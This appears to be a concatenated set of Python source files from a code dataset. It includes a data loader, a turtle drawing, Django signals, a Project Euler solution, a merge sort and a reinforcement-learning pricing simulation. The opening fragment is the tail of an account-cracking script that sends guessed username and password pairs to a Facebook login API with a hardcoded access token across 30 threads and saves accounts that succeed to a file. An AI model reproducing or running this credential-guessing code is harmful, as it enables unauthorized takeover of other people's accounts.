cps.write(k + c + user + pass3 + '\n')
cps.close()
cpb.append(c + user + pass3)
else:
pass4 = 'pakistan'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + <PASSWORD>3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m [SSB_OK] ' + k + c + user + ' | ' + pass4
okb = open('save/SSCP.txt', 'a')
okb.write(k + c + user + pass4 + '\n')
okb.close()
oks.append(c + user + pass3)
elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;91m [SSB_CP] ' + k + c + user + ' | ' + pass4
cps = open('save/SSCP.txt', 'a')
cps.write(k + c + user + pass4 + '\n')
cps.close()
cpb.append(c + user + pass4)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\x1b[1;97m-----------------------------------------------------'
print 'Process Has Been Completed ...'
print 'Total OK : ' + str(len(oks))
print 'Total CP : ' + str(len(cpb))
print '\x1b[1;97m-----------------------------------------------------'
raw_input('Press enter to back SSB Menu ')
if __name__ == '__main__':
menu()
# Mau <NAME>?
| StarcoderdataPython |
11325336 | <gh_stars>0
import os.path as osp
import lmdb
import pyarrow as pa
import torch.utils.data as data
import copy
from srcOld.dataloader_utils import SeqFlip
class Dataset_lmdb(data.Dataset):
    '''
    Reads an lmdb database.
    Expects the data to be packed as follows:
    (features, target, mask)
    features = (seq, pssm, entropy)
    target = (dist, omega, phi, theta)
    '''
    def __init__(self, db_path, transform=None, target_transform=None, mask_transform=None):
        """Open the lmdb environment read-only and cache its length and keys.

        :param db_path: path to the lmdb file or directory
        :param transform: optional pipeline applied to the features; its first
            step may be a SeqFlip whose randomness is re-rolled per sample
        :param target_transform: pipeline applied to the targets; must return
            a (distances, coords) pair
        :param mask_transform: currently unused, kept for interface stability
        """
        self.db_path = db_path
        self.env = lmdb.open(db_path, subdir=osp.isdir(db_path), max_readers=1,
                             readonly=True, lock=False,
                             readahead=False, meminit=False)
        with self.env.begin(write=False) as txn:
            # Length and key list are stored in the db under reserved keys.
            self.length = pa.deserialize(txn.get(b'__len__'))
            self.keys = pa.deserialize(txn.get(b'__keys__'))

        self.transform = transform
        self.target_transform = target_transform
        self.mask_transform = mask_transform

    def __getitem__(self, index):
        """Return (features, distances, coords) for the sample at *index*."""
        with self.env.begin(write=False) as txn:
            byteflow = txn.get(self.keys[index])
        unpacked = pa.deserialize(byteflow)

        # Deep-copy so in-place transforms cannot corrupt cached buffers.
        features = copy.deepcopy(unpacked[0])
        targets = copy.deepcopy(unpacked[1])

        if self.transform is not None:
            # Re-roll the random flip once per sample so every part of the
            # sample is flipped consistently.  (Bug fix: the original touched
            # self.transform.transforms before the None check and crashed
            # when no transform was supplied.)
            if isinstance(self.transform.transforms[0], SeqFlip):
                self.transform.transforms[0].reroll()
            features = self.transform(features)

        # NOTE(review): target_transform is effectively required — without it
        # `distances`/`coords` below would be unbound (pre-existing latent
        # NameError).  TODO confirm all callers pass a target_transform.
        if self.target_transform is not None:
            distances, coords = self.target_transform(targets)
        return features, distances, coords

    def __len__(self):
        # Cached at __init__ from the reserved b'__len__' record.
        return self.length

    def __repr__(self):
        return self.__class__.__name__ + ' (' + self.db_path + ')'
| StarcoderdataPython |
6552577 | <filename>Halloween Special 2019/Halloween 2k19.py
"""Draw a jack-o'-lantern (pumpkin outline, face and stem) with turtle graphics."""
import turtle

# Pen setup: black, medium-thick pen, turtle-shaped cursor.
Spoopy = turtle.Turtle()
Spoopy.color('black')
Spoopy.pensize(5)
Spoopy.shape('turtle')
# Pumpkin outline: right side (alternating 160-step edges).
Spoopy.pendown()
Spoopy.right(90)
Spoopy.forward(160)
Spoopy.left(115)
Spoopy.forward(160)
Spoopy.left(65)
Spoopy.forward(160)
Spoopy.left(115)
Spoopy.forward(160)
# Pumpkin outline: left side.
Spoopy.right(50)
Spoopy.forward(160)
Spoopy.left(115)
Spoopy.forward(160)
Spoopy.left(65)
Spoopy.forward(160)
Spoopy.left(115)
Spoopy.forward(160)
Spoopy.right(65)
Spoopy.forward(160)
# Pumpkin outline: top side, then reposition (pen up) toward the face.
Spoopy.left(130)
Spoopy.forward(160)
Spoopy.left(50)
Spoopy.forward(160)
Spoopy.penup()
Spoopy.left(130)
Spoopy.forward(160)
Spoopy.right(65)
Spoopy.forward(160)
Spoopy.left(115)
# Move into position for the face.
Spoopy.forward(30)
Spoopy.left(65)
Spoopy.forward(20)
Spoopy.pendown()
# Mouth: a long zigzag of 10/20-step teeth.
Spoopy.forward(20)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(20)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(20)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(20)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(20)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(20)
Spoopy.right(65)
Spoopy.forward(20)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(20)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(20)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(20)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.penup()
Spoopy.right(115)
Spoopy.forward(70)
# Left eye.
Spoopy.pendown()
Spoopy.forward(30)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(20)
Spoopy.right(65)
Spoopy.forward(20)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(40)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(20)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.penup()
Spoopy.right(180)
Spoopy.forward(60)
Spoopy.pendown()
# Right eye.
Spoopy.left(65)
Spoopy.forward(40)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.left(65)
Spoopy.forward(10)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(20)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(20)
Spoopy.right(65)
Spoopy.forward(40)
Spoopy.right(115)
Spoopy.forward(10)
Spoopy.left(115)
Spoopy.forward(10)
Spoopy.penup()
Spoopy.forward(90)
Spoopy.right(115)
Spoopy.forward(70)
# Stem on top of the pumpkin.
Spoopy.left(65)
Spoopy.forward(70)
Spoopy.right(130)
Spoopy.forward(70)
Spoopy.pendown()
Spoopy.left(65)
Spoopy.right(65)
Spoopy.forward(20)
Spoopy.left(130)
Spoopy.forward(10)
Spoopy.right(130)
Spoopy.forward(10)
Spoopy.left(130)
Spoopy.forward(10)
Spoopy.right(130)
Spoopy.forward(10)
Spoopy.left(130)
Spoopy.forward(20)
Spoopy.left(50)
Spoopy.forward(20)
Spoopy.left(130)
Spoopy.forward(10)
Spoopy.right(130)
Spoopy.forward(10)
Spoopy.left(130)
Spoopy.forward(10)
Spoopy.right(130)
Spoopy.forward(10)
Spoopy.left(130)
Spoopy.forward(20)
Spoopy.right(65)
Spoopy.forward(10)
Spoopy.right(115)
Spoopy.forward(20)
Spoopy.right(65)
Spoopy.forward(25)
Spoopy.penup()
Spoopy.right(90)
Spoopy.forward(36)
Spoopy.pendown()
Spoopy.right(90)
Spoopy.forward(25)
Spoopy.right(65)
Spoopy.forward(20)
# Park the turtle away from the drawing.
Spoopy.penup()
Spoopy.forward(200)
| StarcoderdataPython |
6650125 | <reponame>uktrade/lite-internal-frontend
from pytest import fixture
import shared.tools.helpers as utils
from pages.queues_pages import QueuesPages
from pages.shared import Shared
@fixture(scope="module")
def add_queue(driver, request, api_url, context):
QueuesPages(driver).click_add_a_queue_button()
extra_string = str(utils.get_formatted_date_time_d_h_m_s())
context.queue_name = "Review" + extra_string
QueuesPages(driver).enter_queue_name(context.queue_name)
Shared(driver).click_submit()
| StarcoderdataPython |
8059246 | <filename>acl/signals.py<gh_stars>0
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.models import ContentType
from django.db.models.signals import post_save
from django.dispatch import receiver
from .models import ACLBase
from entity.models import Entity, EntityAttr
from entry.models import Entry, Attribute
from airone.lib.acl import ACLType
def create_permission(instance):
    """Create one Permission per available ACL type for *instance*."""
    content_type = ContentType.objects.get_for_model(instance)
    for acltype in ACLType.availables():
        Permission(
            name=acltype.name,
            codename="%s.%s" % (instance.id, acltype.id),
            content_type=content_type,
        ).save()
@receiver(post_save, sender=ACLBase)
def aclbase_create_permission(sender, instance, created, **kwargs):
    """Attach ACL permissions to newly created ACLBase rows."""
    if not created:
        return
    create_permission(instance)
@receiver(post_save, sender=Entity)
def entity_create_permission(sender, instance, created, **kwargs):
    """Attach ACL permissions to newly created Entity rows."""
    if not created:
        return
    create_permission(instance)
@receiver(post_save, sender=EntityAttr)
def entity_attr_create_permission(sender, instance, created, **kwargs):
    """Attach ACL permissions to newly created EntityAttr rows."""
    if not created:
        return
    create_permission(instance)
@receiver(post_save, sender=Entry)
def entry_create_permission(sender, instance, created, **kwargs):
    """Attach ACL permissions to newly created Entry rows."""
    if not created:
        return
    create_permission(instance)
@receiver(post_save, sender=Attribute)
def attribute_create_permission(sender, instance, created, **kwargs):
    """Attach ACL permissions to newly created Attribute rows."""
    if not created:
        return
    create_permission(instance)
| StarcoderdataPython |
9646200 | """
[ref.href] https://projecteuler.net/problem=13
Large sum.
Work out the first ten digits of the sum of the following one-hundred 50-digit numbers.
37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690
"""
BIGNUM = \
"37107287533902102798797998220837590246510135740250\
46376937677490009712648124896970078050417018260538\
74324986199524741059474233309513058123726617309629\
91942213363574161572522430563301811072406154908250\
23067588207539346171171980310421047513778063246676\
89261670696623633820136378418383684178734361726757\
28112879812849979408065481931592621691275889832738\
44274228917432520321923589422876796487670272189318\
47451445736001306439091167216856844588711603153276\
70386486105843025439939619828917593665686757934951\
62176457141856560629502157223196586755079324193331\
64906352462741904929101432445813822663347944758178\
92575867718337217661963751590579239728245598838407\
58203565325359399008402633568948830189458628227828\
80181199384826282014278194139940567587151170094390\
35398664372827112653829987240784473053190104293586\
86515506006295864861532075273371959191420517255829\
71693888707715466499115593487603532921714970056938\
54370070576826684624621495650076471787294438377604\
53282654108756828443191190634694037855217779295145\
36123272525000296071075082563815656710885258350721\
45876576172410976447339110607218265236877223636045\
17423706905851860660448207621209813287860733969412\
81142660418086830619328460811191061556940512689692\
51934325451728388641918047049293215058642563049483\
62467221648435076201727918039944693004732956340691\
15732444386908125794514089057706229429197107928209\
55037687525678773091862540744969844508330393682126\
18336384825330154686196124348767681297534375946515\
80386287592878490201521685554828717201219257766954\
78182833757993103614740356856449095527097864797581\
16726320100436897842553539920931837441497806860984\
48403098129077791799088218795327364475675590848030\
87086987551392711854517078544161852424320693150332\
59959406895756536782107074926966537676326235447210\
69793950679652694742597709739166693763042633987085\
41052684708299085211399427365734116182760315001271\
65378607361501080857009149939512557028198746004375\
35829035317434717326932123578154982629742552737307\
94953759765105305946966067683156574377167401875275\
88902802571733229619176668713819931811048770190271\
25267680276078003013678680992525463401061632866526\
36270218540497705585629946580636237993140746255962\
24074486908231174977792365466257246923322810917141\
91430288197103288597806669760892938638285025333403\
34413065578016127815921815005561868836468420090470\
23053081172816430487623791969842487255036638784583\
11487696932154902810424020138335124462181441773470\
63783299490636259666498587618221225225512486764533\
67720186971698544312419572409913959008952310058822\
95548255300263520781532296796249481641953868218774\
76085327132285723110424803456124867697064507995236\
37774242535411291684276865538926205024910326572967\
23701913275725675285653248258265463092207058596522\
29798860272258331913126375147341994889534765745501\
18495701454879288984856827726077713721403798879715\
38298203783031473527721580348144513491373226651381\
34829543829199918180278916522431027392251122869539\
40957953066405232632538044100059654939159879593635\
29746152185502371307642255121183693803580388584903\
41698116222072977186158236678424689157993532961922\
62467957194401269043877107275048102390895523597457\
23189706772547915061505504953922979530901129967519\
86188088225875314529584099251203829009407770775672\
11306739708304724483816533873502340845647058077308\
82959174767140363198008187129011875491310547126581\
97623331044818386269515456334926366572897563400500\
42846280183517070527831839425882145521227251250327\
55121603546981200581762165212827652751691296897789\
32238195734329339946437501907836945765883352399886\
75506164965184775180738168837861091527357929701337\
62177842752192623401942399639168044983993173312731\
32924185707147349566916674687634660915035914677504\
99518671430235219628894890102423325116913619626622\
73267460800591547471830798392868535206946944540724\
76841822524674417161514036427982273348055556214818\
97142617910342598647204516893989422179826088076852\
87783646182799346313767754307809363333018982642090\
10848802521674670883215120185883543223812876952786\
71329612474782464538636993009049310363619763878039\
62184073572399794223406235393808339651327408011116\
66627891981488087797941876876144230030984490851411\
60661826293682836764744779239180335110989069790714\
85786944089552990653640447425576083659976645795096\
66024396409905389607120198219976047599490197230297\
64913982680032973156037120041377903785566085089252\
16730939319872750275468906903707539413042652315011\
94809377245048795150954100921645863754710598436791\
78639167021187492431995700641917969777599028300699\
15368713711936614952811305876380278410754449733078\
40789923115535562561142322423255033685442488917353\
44889911501440648020369068063960672322193204149535\
41503128880339536053299340368006977710650566631954\
81234880673210146739058568557934581403627822703280\
82616570773948327592232845941706525094512325230608\
22918802058777319719839450180888072429661980811197\
77158542502016545090413245809786882778948721859617\
72107838435069186155435662884062257473692284509516\
20849603980134001723930671666823555245252804609722\
53503534226472524250874054075591789781264330331690"
def first_digits_of_chunked_sum(numstr, chunk_len, n_digits):
    """Sum consecutive *chunk_len*-digit integers packed in *numstr*.

    Splits the digit string into fixed-width chunks, adds them as ints,
    and returns the first *n_digits* digits of the total as a string.
    """
    total = sum(int(numstr[i:i + chunk_len])
                for i in range(0, len(numstr) - chunk_len + 1, chunk_len))
    return str(total)[:n_digits]


if __name__ == "__main__":
    numcount = 100       # how many addends are packed into BIGNUM
    digcount = 50        # digits per addend
    finddigcount = 10    # how many leading digits of the sum to report
    digs = first_digits_of_chunked_sum(BIGNUM, digcount, finddigcount)
    # Parenthesized single-argument print works under both Python 2 and 3
    # (the original used the Python-2-only print statement).
    print("The first %d digits of the sum of %d %d-digit number are: %s." % (finddigcount,
                                                                             numcount,
                                                                             digcount,
                                                                             digs))
| StarcoderdataPython |
11302192 | <reponame>nekitdev/entrypoint.py
from typing import Any, Callable, Type, TypeVar, overload
__all__ = ("MAIN", "EntryPoint", "entrypoint", "is_main")
R = TypeVar("R")
Main = Callable[[], R]
# XXX: change to M[R] if/when HKTs get added?
M = TypeVar("M", bound=Main[Any])
MAIN = "__main__"
def is_main(name: str) -> bool:
    """Return ``True`` when *name* is the ``__main__`` module name."""
    return MAIN == name
class EntryPoint:
    """Concrete object behind the ``@entrypoint`` decorator.

    Remembers the module name it was created with and, when applied to a
    function, invokes that function only if the name equals ``__main__``.
    """

    def __init__(self, name: str) -> None:
        self._name = name

    @property
    def name(self) -> str:
        """Module name captured at construction time."""
        return self._name

    def call(self, main: M) -> M:
        """Run *main* when in the ``__main__`` module; always return it."""
        if not is_main(self.name):
            return main
        main()
        return main

    def __call__(self, main: M) -> M:
        return self.call(main)
EP = TypeVar("EP", bound=EntryPoint)
@overload
def entrypoint(name: str) -> EntryPoint:
    ...
@overload
def entrypoint(name: str, entrypoint_type: Type[EP]) -> EP:
    ...
def entrypoint(name: str, entrypoint_type: Type[Any] = EntryPoint) -> Any:
    """Create an entry-point decorator bound to *name*.

    There is no dark magic involved: callers hand over their own
    ``__name__``, and the returned object simply compares that value
    against ``__main__`` before deciding whether to call the wrapped
    function.
    """
    return entrypoint_type(name)
| StarcoderdataPython |
1615982 | <filename>manage.py
from flask_script import Manager
from songbase import app, db, Professor, Course
manager = Manager(app)
# reset the database and create some initial data
@manager.command
def deploy():
    """Drop and recreate every table, then seed demo professors and courses."""
    db.drop_all()
    db.create_all()
    harry = Professor(name='Harry', department='Accounting & MIS')
    professor_hubert = Professor(name='<NAME>', department='Mathematics')
    skip = Professor(name='Skip', department='Accounting & MIS')
    professor_davis = Professor(name="<NAME>", department="Finance")
    course1 = Course(number='MISY350', title="Application Development", description="JS,CSS,HTML,GitHub,Python", professor=harry)
    course2 = Course(number='BUAD447', title="Data Analysis Quality Control", description="Statistical approach to operations management", professor=professor_hubert)
    # "contol" typo fixed -> "control"
    course3 = Course(number='BUAD446', title="Operations and Supply Chains", description="Learn about planning and control in operations management", professor=professor_davis)
    course4 = Course(number='MISY430', title="Systems Analysis and Implementation", description="Further your knowledge in database design and application concepts", professor=skip)
    # add_all replaces the eight individual db.session.add() calls.
    db.session.add_all([harry, professor_hubert, skip, professor_davis,
                        course1, course2, course3, course4])
    db.session.commit()
if __name__ == "__main__":
    # Dispatch Flask-Script commands, e.g. `python manage.py deploy`.
    manager.run()
| StarcoderdataPython |
def method1(ll: list) -> list:
    """Return a sorted copy of *ll* using top-down merge sort.

    The input list is not modified.
    """

    def merge(left: list, right: list) -> list:
        # Merge two already-sorted lists into one sorted list.
        result = []
        i, j = 0, 0
        while i < len(left) and j < len(right):
            if left[i] <= right[j]:
                result.append(left[i])
                i += 1
            else:
                result.append(right[j])
                j += 1
        # One side is exhausted; append the remainder of the other.
        result += left[i:]
        result += right[j:]
        return result

    def mergesort(seq: list) -> list:
        # Parameter renamed from `list` (shadowed the builtin).
        if len(seq) < 2:
            return seq
        # Integer division: `len(seq) / 2` is a float on Python 3 and
        # raises TypeError when used as a slice index.
        middle = len(seq) // 2
        left = mergesort(seq[:middle])
        right = mergesort(seq[middle:])
        return merge(left, right)

    # The original defined the helpers but never invoked them, returning
    # None despite the `-> list` annotation (and the timeit benchmark below
    # clearly expects a sort to happen).
    return mergesort(ll)
if __name__ == "__main__":
    # Benchmark snippet deliberately disabled: the body is a bare string
    # literal, so nothing executes here.
    """
    l = [1, 3, 4, 7, 5, 9]
    from timeit import timeit
    print(timeit(lambda: method1(l), number=10000)) # 0.009614205999241676
    """
| StarcoderdataPython |
1829140 | <filename>old_source_code/Experiment 3- Tuning the first provider_s cost/wolfphc_MultiState.py<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
推荐: recommend
y ∈ (0.0200,0.0500]
"""
"""
备注:notes
在这个版本中,用于计算R的x_{i,j}可以取连续的数值,由下式计算得到。
In this version, x_{i,j} used for calculating R is continous, and calcluated by the following formula
x_j = V * yAll[j] + A / d - np.e
状态:状态设置为上一时刻的卖家的联合动作
State: all the providers price at t-1
"""
import numpy as np
import matplotlib.pyplot as plt
import performance as pf
import time
def sellerAction2y(sellerAction, sellerActionSize, y_min, y_max):
    """Map a discrete action index onto the continuous price range.

    Action 0 maps to y_min; each further action adds one step of
    (y_max - y_min) / sellerActionSize.  Works element-wise when
    sellerAction is a numpy array.
    """
    step = (y_max - y_min) / sellerActionSize
    return y_min + step * sellerAction
def allSellerActions2stateIndex(allSellerActions, N, sellerActionSize):
    """Encode the joint action of N sellers as one integer.

    Interprets the N action indices as digits of a base-`sellerActionSize`
    number (seller 0 is the most significant digit).
    """
    stateIndex = 0
    for j in range(N):
        stateIndex = stateIndex * sellerActionSize + allSellerActions[j]
    return stateIndex
class Seller:
    """WoLF-PHC learning agent representing one service provider (seller).

    Each seller keeps a Q table, a stochastic policy and a running-average
    policy over a discretised state/action space, and updates them with the
    WoLF ("win or learn fast") variable-step-size PHC rule.
    """
    def __init__(self,sellerIndex,selleractionSize,stateSize,c_j,y_min,y_max):
        # Seller's own information: cost coefficient for this provider.
        self.__c = c_j
        # Seller index, state-space size and action-space size.
        self.__sellerIndex = sellerIndex
        self.__stateSize = stateSize
        self.__actionSize = selleractionSize
        self.__y_min = y_min
        self.__y_max = y_max
        # Current state, latest action and its continuous price y.
        self.__currentState = np.random.randint(0,self.__stateSize)
        self.__nextState = -1
        self.__action = -1
        self.__y = -1
        # Q table, mean policy, policy and per-state visit counter.
        # Both policies start uniform over the actions.
        self.__Q = np.zeros((self.__stateSize,self.__actionSize))
        self.__policy = np.ones((self.__stateSize,self.__actionSize)) \
            * (1 / self.__actionSize)
        self.__meanPolicy = np.ones((self.__stateSize,self.__actionSize)) \
            * (1 / self.__actionSize)
        self.__count = np.zeros(self.__stateSize)
    def show(self):
        # Debug helper: dump the seller's full internal state to stdout.
        print("\nself.__c =",self.__c)
        print("self.__sellerIndex =",self.__sellerIndex)
        print("self.__stateSize =",self.__stateSize)
        print("self.__actionSize =",self.__actionSize)
        print("self.__y_min =",self.__y_min)
        print("self.__y_max =",self.__y_max)
        print("self.__currentState =",self.__currentState)
        print("self.__nextState =",self.__nextState)
        print("self.__action =",self.__action)
        print("self.__y =",self.__y)
        print("self.__Q =\n",self.__Q)
        print("self.__policy =\n",self.__policy)
        print("self.__meanPolicy =\n",self.__meanPolicy)
        print("self.__count =\n",self.__count)
        print()
    def actionSelect(self):
        # Sample an action from the current state's mixed policy
        # (inverse-CDF sampling over the policy row).
        randomNumber = np.random.random()
        # print("self.__sellerIndex =",self.__sellerIndex)
        # print("randomNumber =",randomNumber)
        self.__action = 0
        while randomNumber >= self.__policy[self.__currentState][self.__action]:
            randomNumber -= self.__policy[self.__currentState][self.__action]
            self.__action += 1
        # Cache the continuous price y corresponding to the sampled action.
        self.__y = sellerAction2y(self.__action,self.__actionSize,
                                  self.__y_min,self.__y_max)
        # print("self.__action =",self.__action,"\n")
        return self.__action
    def Qmax(self):
        # Best Q value attainable from the (already recorded) next state.
        return max(self.__Q[self.__nextState])
    def updateQ(self,allSellerActions,x_j,α,df,N,sellerActionSize):
        # print("\nself.__sellerIndex =",self.__sellerIndex)
        # print("self.__currentState =",self.__currentState)
        # print("Q row before update:")
        # print("self.__Q[self.__currentState] =",self.__Q[self.__currentState])
        # print("α =",α)
        # Instant reward R: this seller's share of total demand times its
        # per-unit margin (1/y is the unit price, __c the cost coefficient).
        yAll = sellerAction2y(allSellerActions,sellerActionSize,
                              self.__y_min,self.__y_max)
        R = self.__y / sum(yAll) * (1 / self.__y - self.__c) * sum(x_j)
        # print("corresponding R =",R)
        # The next state is the joint action of all sellers at this step.
        self.__nextState = allSellerActions2stateIndex(allSellerActions,\
                                                       N,sellerActionSize)
        # print("self.__nextState =",self.__nextState)
        # Standard Q-learning update with learning rate α and discount df.
        # print("self.Qmax() =",self.Qmax())
        self.__Q[self.__currentState][self.__action] = \
            (1 - α) * self.__Q[self.__currentState][self.__action] \
            + α * (R + df * self.Qmax())
        # print("Q row after update:")
        # print("self.__Q[self.__currentState] =",self.__Q[self.__currentState])
    def updateMeanPolicy(self):
        # Incremental running average of the policy for the current state:
        # meanPolicy += (policy - meanPolicy) / visit_count.
        # print("self.__count[self.__currentState] =",self.__count[self.__currentState])
        # print("self.__meanPolicy[self.__currentState] =\n",self.__meanPolicy[self.__currentState])
        # print("self.__policy[self.__currentState] =\n",self.__policy[self.__currentState])
        self.__count[self.__currentState] += 1
        self.__meanPolicy[self.__currentState] += \
            (self.__policy[self.__currentState] - \
            self.__meanPolicy[self.__currentState]) \
            / self.__count[self.__currentState]
        # print("self.__count[self.__currentState] =",self.__count[self.__currentState])
        # print("self.__meanPolicy[self.__currentState] =\n",self.__meanPolicy[self.__currentState])
        # print("self.__policy[self.__currentState] =\n",self.__policy[self.__currentState])
    def updatePolicy(self,δ_win):
        # WoLF step size: small δ when "winning" (current policy beats the
        # average policy against the current Q row), 50x larger when losing.
        δ_lose = 50 * δ_win
        # r1 = np.dot(self.__policy[self.__currentState],self.__Q[self.__currentState])
        # r2 = np.dot(self.__meanPolicy[self.__currentState],self.__Q[self.__currentState])
        # print("r1 =",r1,"r2 =",r2)
        if np.dot(self.__policy[self.__currentState],self.__Q[self.__currentState]) \
            > np.dot(self.__meanPolicy[self.__currentState],self.__Q[self.__currentState]):
            δ = δ_win
            # print("δ = δ_win")
        else:
            δ = δ_lose
            # print("δ = δ_lose")
        bestAction = np.argmax(self.__Q[self.__currentState])
        # print("bestAction =",bestAction)
        # Shift probability mass from every non-best action (capped at what
        # that action still holds) onto the greedy action.
        for i in range(0,self.__actionSize):
            if i == bestAction:
                continue
            Δ = min(self.__policy[self.__currentState][i],
                    δ / (self.__actionSize - 1))
            self.__policy[self.__currentState][i] -= Δ
            self.__policy[self.__currentState][bestAction] += Δ
        # print("policy row after update:")
        # print("self.__policy[self.__currentState] =\n",self.__policy[self.__currentState])
    def updateState(self):
        # Advance to the state recorded by the last updateQ() call.
        self.__currentState = self.__nextState
    def showPolicy(self):
        # Debug helper: print this seller's policies.  (The first literal
        # contains the Chinese word for "seller"; it is runtime output and
        # is therefore left untouched.)
        print("\n卖家",self.__sellerIndex,":") # provider
